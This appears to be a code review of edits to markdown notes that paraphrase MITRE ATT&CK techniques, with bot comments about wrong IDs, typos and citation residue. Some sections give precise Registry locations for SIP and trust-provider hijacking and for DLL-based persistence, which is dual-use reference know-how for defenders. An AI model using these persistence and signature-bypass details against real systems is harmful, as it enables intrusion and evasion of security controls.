* The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services. Depending on the flaw being exploited this may include Exploitation for Defense Evasion.
-------------------------------
## Hardware Additions
* [Drive-by-Compromise - ATT&CK](https://attack.mitre.org/wiki/Technique/T1200)
* Computer accessories, computers or networking hardware may be introduced into a system as a vector to gain execution. While public references of usage by APT groups are scarce, many penetration testers leverage hardware additions for initial access. Commercial and open source products are leveraged with capabilities such as passive network tapping, man-in-the middle encryption breaking, keystroke injection, kernel memory reading via DMA, adding new wireless access to an existing network, and others.
-------------------------------
## Replication Through Removable Media
* [Replication Through Removable Media - ATT&CK](https://attack.mitre.org/wiki/Technique/T1091)
* Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
-------------------------------
## Spearphishing Link
* [Spearphishing Link - ATT&CK](https://attack.mitre.org/wiki/Technique/T1189)
* Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attachment malicious files to the email itself, to avoid defenses that may inspect email attachments.
-------------------------------
## Spearphishing via Service
* [Drive-by-Compromise - ATT&CK](https://attack.mitre.org/wiki/Technique/T1194)
* Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.
* All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.
* A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.
-------------------------------
## Supply Chain Compromise
* [Supply Chain Compromise - ATT&CK](https://attack.mitre.org/wiki/Technique/T1195)
* Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:
* Manipulation of development tools
* Manipulation of a development environment
* Manipulation of source code repositories (public or private)
* Manipulation of software update/distribution mechanisms
* Compromised/infected system images (multiple cases of removable media infected at the factory)
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
-------------------------------
## Trusted Relationship
* [Trusted Relationship - ATT&CK](https://attack.mitre.org/wiki/Technique/T1199)
* Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
* Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, Valid Accounts used by the other party for access to internal network systems may be compromised and used.
-------------------------------
## Valid Accounts
* [Valid Accounts - ATT&CK](https://attack.mitre.org/wiki/Technique/T1078)
* Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access.
* Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
* Adversaries may also create accounts, sometimes using pre-defined account names and passwords, as a means for persistence through backup access in case other means are unsuccessful.
* The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise
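Review bot: Two of the new link entries point at the wrong technique or carry the wrong label. `## Spearphishing Link` links to `T1189`, which is the Drive-by Compromise ID already used at the top of the file; in the current ATT&CK model Spearphishing Link is T1192. Under `## Hardware Additions` and `## Spearphishing via Service` the link text reads `[Drive-by-Compromise - ATT&CK]` although the targets (T1200, T1194) are right, so only the labels need changing. Smaller points: `instead of attachment malicious files` should be `attaching`, `man-in-the middle` should be `man-in-the-middle`, and since the User Execution entry in Execution.md refers to Spearphishing Attachment as a delivery path, that technique (T1193 in the current model) is missing from this Initial Access list.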

+42 -11 Draft/ATT&CK-Stuff/Lateral Movement.md

@ -18,8 +18,11 @@
## Application Deployment Software
-------------------------------
## Application Deployment Software
Application Deployment Software
* [Application Deployment Software - ATT&CK](https://attack.mitre.org/wiki/Technique/T1017)
* Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
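Review bot: The bare `Application Deployment Software` line between the heading and the ATT&CK link duplicates the heading; the following hunk headers show it is still present in the old file, so if this hunk keeps it, remove it.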
@ -28,8 +31,31 @@ Application Deployment Software
* [Owning One To Rule Them All - Defcon20](https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf)
## Exploitation of Vulnerability
-------------------------------
## Distributed Component Object Model
* [Distributed Component Object Model - ATT&CK](https://attack.mitre.org/wiki/Technique/T1175)
* Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM)1 beyond a local computer using remote procedure call (RPC) technology. COM is a component of the Windows application programming interface (API) that enables interaction between software objects. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).
* Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. By default, only Administrators may remotely activate and launch COM objects through DCOM.
* Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications5 as well as other Windows objects that contain insecure methods.67 DCOM can also execute macros in existing documents and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application9, bypassing the need for a malicious document.
-------------------------------
## Exploitation of Remote Services
* [Exploitation of Remote Services - ATT&CK](https://attack.mitre.org/wiki/Technique/T1210)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
* An adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Scanning or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
* There are several well-known vulnerabilities that exist in common services such as SMB and RDP as well as applications that may be used within internal networks such as MySQL3 and web server services.
* Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.
-------------------------------
## Exploitation of Vulnerability
* [Exploitation of Vulnerability - ATT&CK](https://attack.mitre.org/wiki/Technique/T1068)
* Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Exploiting software vulnerabilities may allow adversaries to run a command or binary on a remote system for lateral movement, escalate a current process to a higher privilege level, or bypass security mechanisms. Exploits may also allow an adversary access to privileged accounts and credentials. One example of this is MS14-068, which can be used to forge Kerberos tickets using domain user permissions.Technet MS14-068ADSecurity Detecting Forged Tickets
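Review bot: The new `## Exploitation of Remote Services` section and the retained `## Exploitation of Vulnerability` section open with the same sentence (`Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error...`), and the new section's last bullet already points readers to Exploitation for Privilege Escalation, which is where T1068 lives in the current model this commit is meant to track. Fold the MS14-068 example into the new section and drop the old one rather than carrying both. The pasted text also keeps ATT&CK's footnote numbers as stray digits (`(COM)1`, `Office applications5`, `insecure methods.67`, `application9`, `MySQL3`), and the trailing `Technet MS14-068ADSecurity Detecting Forged Tickets` is two citation labels run together; strip or link them.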
@ -157,20 +183,24 @@ Application Deployment Software
## Shared Webroot
-------------------------------
## Shared Webroot
* [Shared Webroot - ATT&CK](https://attack.mitre.org/wiki/Technique/T1051)
* Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured. This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited.
-------------------------------
## SSH Hijacking
* [SSH Hijacking - ATT*&CK](https://attack.mitre.org/wiki/Technique/T1184)
* Secure Shell (SSH) is a standard means of remote access on Linux and Mac systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
* In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. Compromising the SSH agent also provides access to intercept SSH credentials.
* SSH Hijacking differs from use of Remote Services because it injects into an existing SSH session rather than creating a new session using Valid Accounts.
## Taint Shared Content
-------------------------------
## Taint Shared Content
* [Taint Shared Content - ATT&CK](https://attack.mitre.org/wiki/Technique/T1080)
* Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
* [The Backdoor Factory](https://github.com/secretsquirrel/the-backdoor-factory)
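Review bot: Typo in the SSH Hijacking link text: `[SSH Hijacking - ATT*&CK]` should be `ATT&CK`. The rest of the hunk (Shared Webroot, SSH Hijacking, Taint Shared Content) is consistent with the separator-plus-heading layout used elsewhere in the file.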
@ -178,8 +208,11 @@ Application Deployment Software
## Third-Party Software
-------------------------------
## Third-Party Software
* [Third-party Software - ATT&CK](https://attack.mitre.org/wiki/Technique/T1072)
* Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code.
* Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network. Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.
@ -189,9 +222,8 @@ Application Deployment Software
## Windows Admin Shares
-------------------------------
## Windows Admin Shares
* [Windows Admin Shares - ATT&CK](https://attack.mitre.org/wiki/Technique/T1077)
* Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$.
* Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB)Wikipedia SMB to interact with systems using remote procedure calls (RPCs),TechNet RPC transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.Microsoft Admin Shares
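Review bot: The Windows Admin Shares text retains ATT&CK citation labels as inline prose: `(SMB)Wikipedia SMB`, `(RPCs),TechNet RPC` and `patch levels.Microsoft Admin Shares`. Strip them or move them into link bullets so the sentence reads cleanly.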
@ -204,9 +236,8 @@ Application Deployment Software
## Windows Remote Management
-------------------------------
## Windows Remote Management
* [Windows Remote Management - ATT&CK](https://attack.mitre.org/wiki/Technique/T1028)
* Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).Microsoft WinRM It may be called with the winrm command or by any number of programs such as PowerShell.Jacobsen 2014
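Review bot: This WinRM paragraph is a verbatim copy of the one in Execution.md, including the `services).Microsoft WinRM` and `PowerShell.Jacobsen 2014` citation residue; clean both copies in the same pass.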


+121 -33 Draft/ATT&CK-Stuff/Persistence.md

@ -44,6 +44,11 @@
* [Privilege Escalation via "Sticky" Keys](http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html)
-------------------------------
## AppCert DLLs
* [AppCert DLLs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1182)
@ -56,6 +61,10 @@
* Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
-------------------------------
## AppInit DLLs
* [AppInit DLLs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1103)
@ -108,6 +117,15 @@
-------------------------------
## BITS Jobs
* [BITS Jobs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1197)
* Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM)1.2 BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
* The interface to create and manage BITS jobs is accessible through PowerShell and the BITSAdmin tool.
* Adversaries may abuse BITS to download, execute, and even clean up after malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.456 BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).
* BITS upload functionalities can also be used to perform Exfiltration Over Alternative Protocol.
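Review bot: Footnote markers from the ATT&CK page survive as stray digits in the BITS text: `(COM)1.2` and `host firewalls.456`. Remove them or expand them into links; otherwise the new section is a useful addition and the 90-day default job lifetime is a good detection hint to keep.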
@ -123,6 +141,16 @@
--------------------------------
## Browser Extensions
* [Browser Extensions - ATT&CK](https://attack.mitre.org/wiki/Technique/T1176)
* Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access.
* Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so may not be difficult for malicious extensions to defeat automated scanners and be uploaded. Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser, to include credentials, and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions. There have also been similar examples of extensions being used for command & control.
-------------------------------
## Change Default File Association
* [Change Default File Association - ATT&CK](https://attack.mitre.org/wiki/Technique/T1042)
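Review bot: Minor grammar in the Browser Extensions paragraph: `so may not be difficult for malicious extensions` is missing its subject and should read `so it may not be difficult`.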
@ -163,28 +191,11 @@
-------------------------------
## Cron Job
* [Cron Job - ATT&CK](https://attack.mitre.org/wiki/Technique/T1168)
* System-wide cron jobs are installed by modifying /etc/crontab while per-user cron jobs are installed using crontab with specifically formatted crontab files 1. This works on Mac and Linux systems.
* Both methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence234, to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.
#### Linux
* [Intro to Cron - unixgeeks](http://www.unixgeeks.org/security/newbie/unix/cron-1.html)
* [Scheduling Tasks with Cron Jobs - tutsplus](https://code.tutsplus.com/tutorials/scheduling-tasks-with-cron-jobs--net-8800)
#### OS X
* Per Apple’s developer documentation, there are two supported methods for creating periodic background jobs: launchd and cron1.
* Launchd
* Each Launchd job is described by a different configuration property list (plist) file similar to Launch Daemons or Launch Agents, except there is an additional key called StartCalendarInterval with a dictionary of time values. This only works on macOS and OS X.
* cron
* System-wide cron jobs are installed by modifying /etc/crontab while per-user cron jobs are installed using crontab with specifically formatted crontab files. This works on Mac and Linux systems.
* Both methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence234, to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.
## Create Account
* [Create Account - ATT&CK](https://attack.mitre.org/wiki/Technique/T1136)
* Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
The `net user` commands can be used to create a local or domain account.
-------------------------------
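Review bot: `## Create Account` follows the cron bullets with no `-------------------------------` separator, unlike every other heading in the file, and its last line (`The `net user` commands can be used...`) is the only non-bullet line in the section; add the separator and make it a `*` item. The cron text also carries ATT&CK footnote digits as prose (`crontab files 1`, `persistence234`, `launchd and cron1`). If the shorter version of the section is the one that survives this hunk, make sure the `Intro to Cron` and `Scheduling Tasks with Cron Jobs` links are not dropped with the old structure, since the surrounding sections keep their external links.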
@ -202,9 +213,8 @@
## Dylib Hijacking
---------------
## Dylib Hijacking
* [Dylib Hijacking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1157)
* macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.
* A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itselfWriting Bad Malware for OSXMalware Persistence on OS X.
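Review bot: `application itselfWriting Bad Malware for OSXMalware Persistence on OS X` is two reference titles fused onto the end of the sentence; end the sentence at `itself` and list the two references as link bullets. The separator above this heading (`---------------`) is also much shorter than the rule used elsewhere in the file; harmless for rendering but inconsistent.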
@ -263,6 +273,33 @@
* Users can mark specific files as hidden by using the attrib.exe binary. Simply do attrib +h filename to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.
----------------------------
## Hooking
* [Hooking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1179)
* Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:
* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.
* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.
* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.
* Similar to Process Injection, adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.
* Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access.
* Hooking is commonly utilized by Rootkits to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors.
* **Tools**
* [Hooks Overview - msdn.ms](https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx)
* [Userland Rootkits: Part 1, IAT hooks - adlice.com](https://www.adlice.com/userland-rootkits-part-1-iat-hooks/)
* [Dynamic Hooking Techniques: User Mode - matt hillman](https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/)
* [Inline Hooking in Windows](https://webcache.googleusercontent.com/search?q=cache:mkBFZwQOVQAJ:https://www.exploit-db.com/docs/17802.pdf+&cd=1&hl=en&ct=clnk&gl=us)
* [gethooks](https://github.com/jay/gethooks)
* GetHooks is a program designed for the passive detection and monitoring of hooks from a limited user account.
* [winhook](https://github.com/prekageo/winhook)
-------------------------------
## Hypervisor
* [Hypervisor - ATT&CK](https://attack.mitre.org/wiki/Technique/T1062)
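Review bot: The three hooking variants (`**Hooks procedures**`, `**Import address table (IAT) hooking**`, `**Inline hooking**`) are written as top-level `*` items, so they render as siblings of the sentence that introduces them (`...can be implemented via:`) rather than as its sub-list; indent them. The `**Tools**` list mixes references (the MSDN Hooks Overview, the adlice and MWR articles) with actual tools (gethooks, winhook); split it into references and tools. The `Inline Hooking in Windows` entry links through a Google web cache URL, which will rot; link the exploit-db document it wraps (https://www.exploit-db.com/docs/17802.pdf) directly.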
@ -271,6 +308,10 @@
---------------------------
## Image File Execution Options Injection
* [Image File Execution Options Injection - ATT&CK](https://attack.mitre.org/wiki/Technique/T1183)
@ -294,6 +335,14 @@
-------------------------------
## LSASS Driver
* [LSASS Driver - ATT&CK](https://attack.mitre.org/wiki/Technique/T1177)
* The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
* Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., DLL Side-Loading or DLL Search Order Hijacking), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.
-------------------------------
## Launch Agent
@ -330,16 +379,6 @@
-------------------------------
## Local Port Monitor
* [Local Port Monitor - ATT&CK](https://attack.mitre.org/wiki/Technique/T1013)
* A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.AddMonitor This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot.Bloxham Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.Bloxham The spoolsv.exe process also runs under SYSTEM level permissions. Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
#### Windows
* [AddMonitor function](https://msdn.microsoft.com/en-us/library/dd183341)
-------------------------------
## Login Item
@ -484,6 +523,32 @@ Netsh Helper DLL
-------------------------------
## Port Knocking
* [Port Knocking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1205)
* Port Knocking is a well-established method used by both defenders and adversaries to hide open ports from access. To enable the port, the system expects a series of packets with certain characteristics before the port will be opened. This is often accomlished by the host based firewall, but could also be implemented by custom software.
* This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
* The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r, is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
-------------------------------
## Port Monitors
* [Port Monitors - ATT&CK](https://attack.mitre.org/wiki/Technique/T1013)
* A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.1 This DLL can be located in `C:\Windows\System32` and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to `HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors`. The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
* Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
-------------------------------
## Rc.common
* [Rc.common - ATT&CK](https://attack.mitre.org/wiki/Technique/T1163)
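Review bot: in the Port Knocking bullets, "accomlished" should be "accomplished", and "This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection" reads better as "This technique has been observed both for dynamically opening a listening port and for initiating a connection to a listening server on another system." In the Port Monitors bullet, "at startup.1" carries a footnote number copied from the ATT&CK page; drop it or turn it into a link. The Local Port Monitor block removed earlier in this file carried the AddMonitor reference (`* [AddMonitor function](https://msdn.microsoft.com/en-us/library/dd183341)`), which this replacement section does not keep, while the Privilege_Escalation.md copy of the same section in this commit does; carry it over here as well.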
@ -533,6 +598,20 @@ Netsh Helper DLL
-------------------------------
## SIP and Trust Provider Hijacking
* [SIP and Trust Provider Hijacking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1198)
* In user mode, Windows Authenticode1 digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature.
* Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all ) and are identified by globally unique identifiers (GUIDs).
* Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by:
* Modifying the `Dll` and `FuncName` Registry values in `HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}` that point to the dynamic link library (DLL) providing a SIP’s `CryptSIPDllGetSignedDataMsg` function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value all files using that SIP6 (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the `Dll` and `FuncName` Registry values in `HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}` that point to the DLL providing a SIP’s `CryptSIPDllVerifyIndirectData` function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP6 (with or without hijacking the previously mentioned `CryptSIPDllGetSignedDataMsg` function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the `DLL` and `Function` Registry values in `HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}` that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s `CryptSIPDllVerifyIndirectData` function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.
* Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.
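Review bot: the two CryptSIP Registry paths are written inconsistently: the first is `HKLM\SOFTWARE[\WOW6432Node\]Microsoft\...` and the second `HKLM\SOFTWARE\[WOW6432Node\]Microsoft\...`; the second form, with the backslash before the optional bracketed component, is the one that expands to a valid path, so use it in both. Footnote residue is also left in "Authenticode1" and in "using that SIP6" (twice), and "apply an acceptable signature value all files" is missing "to".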
@ -622,6 +701,15 @@ Netsh Helper DLL
-------------------------------
## Time Providers
* [Time Providers - ATT&CK](https://attack.mitre.org/wiki/Technique/T1209)
* The Windows Time service (W32Time) enables time synchronization across and within domains. W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.
* Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`. The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.
* Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.
-------------------------------


+ 110
- 51
Draft/ATT&CK-Stuff/Privilege_Escalation.md

@ -51,6 +51,19 @@
-------------------------------
## AppCert DLLs
* [AppCert DLLs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1182)
* Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager are loaded into every process that calls the ubiquitously used application programming interface (API) functions:1
* CreateProcess
* CreateProcessAsUser
* CreateProcessWithLoginW
* CreateProcessWithTokenW
* WinExec
* Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
-------------------------------
## AppInit DLLs
* [AppInit DLLs - ATT&CK](https://attack.mitre.org/wiki/Technique/T1103)
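Review bot: "functions:1" in the AppCert DLLs bullet is a footnote marker carried over from the ATT&CK page; drop it. For consistency with the Port Monitors and Time Providers sections in this commit, put the Registry key path `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager` and the five API names (CreateProcess through WinExec) in backticks.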
@ -158,9 +171,9 @@
## Dylib Hijacking
---------------
## Dylib Hijacking
* [Dylib Hijacking - ATT&CK](https://attack.mitre.org/wiki/Technique/T1157)
* macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.
* A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itselfWriting Bad Malware for OSXMalware Persistence on OS X.
